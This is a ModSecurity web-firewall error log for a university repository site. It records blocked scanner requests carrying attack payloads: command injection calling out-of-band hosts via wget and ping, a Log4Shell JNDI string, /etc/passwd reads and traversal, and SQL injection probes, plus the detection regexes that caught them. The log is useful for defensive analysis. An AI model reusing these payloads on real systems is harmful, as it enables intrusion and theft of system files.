[Tue Aug 29 11:33:24.350096 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within ARGS:Cmd: ping${IFS}-c${IFS}1${IFS}cjmn8l5jmimk2adbbnlgkuzwne6csm35n.oast.site"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/admin.cgi"] [unique_id "ZO11FMCo-f0AAARdiI8AAAAK"]
[Tue Aug 29 11:33:24.356004 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/boards/forumrunner/request.php"] [unique_id "ZO11FMCo-f0AAARy-s4AAAAb"]
[Tue Aug 29 11:33:25.331166 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/board/forumrunner/request.php"] [unique_id "ZO11FcCo-f0AAARA7f4AAAAA"]
[Tue Aug 29 11:33:25.350325 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ReaderNo. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ` found within ARGS:ReaderNo: `sleep 7`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/card_scan.php"] [unique_id "ZO11FcCo-f0AAARA7f8AAAAA"]
[Tue Aug 29 11:33:26.445564 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uploaddir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:uploaddir: ';whoami;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/upgrade_handle.php"] [unique_id "ZO11FsCo-f0AAAOJKdIAAAAE"]
[Tue Aug 29 11:33:26.460264 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/forum/forumrunner/request.php"] [unique_id "ZO11FsCo-f0AAARjjMQAAAAL"]
[Tue Aug 29 11:33:26.487649 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:userName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:userName: ${jndi:ldap://${:-584}${:-462}.${hostName}.username.cjmn8l5jmimk2adbbnlgq1535spzittcg.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/ui/login.action"] [unique_id "ZO11FsCo-f0AAARy-tYAAAAb"]
[Tue Aug 29 11:33:27.330818 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/forums/forumrunner/request.php"] [unique_id "ZO11F8Co-f0AAARy-tgAAAAb"]
[Tue Aug 29 11:33:27.332320 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:rootUname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:rootUname:  cat/etc/passwd #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php"] [unique_id "ZO11F8Co-f0AAARfwlEAAAAI"]
[Tue Aug 29 11:33:27.346971 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp1/home-18/"] [unique_id "ZO11F8Co-f0AAARdiJkAAAAK"]
[Tue Aug 29 11:33:28.345311 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/vb/forumrunner/request.php"] [unique_id "ZO11GMCo-f0AAARA7gwAAAAA"]
[Tue Aug 29 11:33:29.348537 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:logName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:logName: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/enginemanager/server/logs/download"] [unique_id "ZO11GcCo-f0AAARjjNMAAAAL"]
[Tue Aug 29 11:33:30.649702 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Rule 7fe1c63de7c8 [id "950901"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "77"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "repositoryfeb.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11GsCo-f0AAARdiKQAAAAK"]
[Tue Aug 29 11:33:30.652838 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ` found within XML: \\x0a    \\x0a    foo\\x0a    \\x0a        \\x0a            \\x0a                2\\x0a                \\x0a                    \\x0a                        \\x0a                            mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\\x0a                            \\x0a                                \\x0a                                \\x0a                                Compare\\x0a                                \\x0a                                \\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "repositoryfeb.unla.ac.id"] [uri "/sitecore/shell/ClientBin/Reporting/Report.ashx"] [unique_id "ZO11GsCo-f0AAARdiKQAAAAK"]
[Tue Aug 29 11:33:32.050491 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:username:  `cat/etc/passwd`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/login"] [unique_id "ZO11HMCo-f0AAARfwmgAAAAI"]
[Tue Aug 29 11:33:32.319580 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ;'wget http:/cjmn8l5jmimk2adbbnlg4ksxhfzi1zyqi.oast.site;'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/mesh.cgi"] [unique_id "ZO11HMCo-f0AAARv7S0AAAAY"]
[Tue Aug 29 11:33:32.399555 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO11HMCo-f0AAARv7TEAAAAY"]
[Tue Aug 29 11:33:34.368152 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/jexws/jexws.jsp"] [unique_id "ZO11HsCo-f0AAARLXy0AAAAQ"]
[Tue Aug 29 11:33:35.347942 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/jexws4/jexws4.jsp"] [unique_id "ZO11H8Co-f0AAASBXQQAAAAM"]
[Tue Aug 29 11:33:35.383700 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11H8Co-f0AAARnmKQAAAAR"]
[Tue Aug 29 11:33:36.335928 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/jexinv4/jexinv4.jsp"] [unique_id "ZO11IMCo-f0AAAR@KGAAAAAF"]
[Tue Aug 29 11:33:36.344328 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:old. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:old: test|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/password_change.cgi"] [unique_id "ZO11IMCo-f0AAAOJKe4AAAAE"]
[Tue Aug 29 11:33:36.355280 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/status"] [unique_id "ZO11IMCo-f0AAARv7TcAAAAY"]
[Tue Aug 29 11:33:37.323516 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/stats"] [unique_id "ZO11IcCo-f0AAASAHa0AAAAH"]
[Tue Aug 29 11:33:37.374976 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/jbossass/jbossass.jsp"] [unique_id "ZO11IcCo-f0AAANsAiQAAAAD"]
[Tue Aug 29 11:33:38.416258 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: 1 AND (SELECT 1 FROM (SELECT(SLEEP(6)))A)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ZO11IsCo-f0AAARy-wcAAAAb"]
[Tue Aug 29 11:33:38.562023 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/test"] [unique_id "ZO11IsCo-f0AAARjjO8AAAAL"]
[Tue Aug 29 11:33:39.347718 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ZO11I8Co-f0AAAR@KGwAAAAF"]
[Tue Aug 29 11:33:40.319734 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'MwLj'='MwLj found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5435' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag 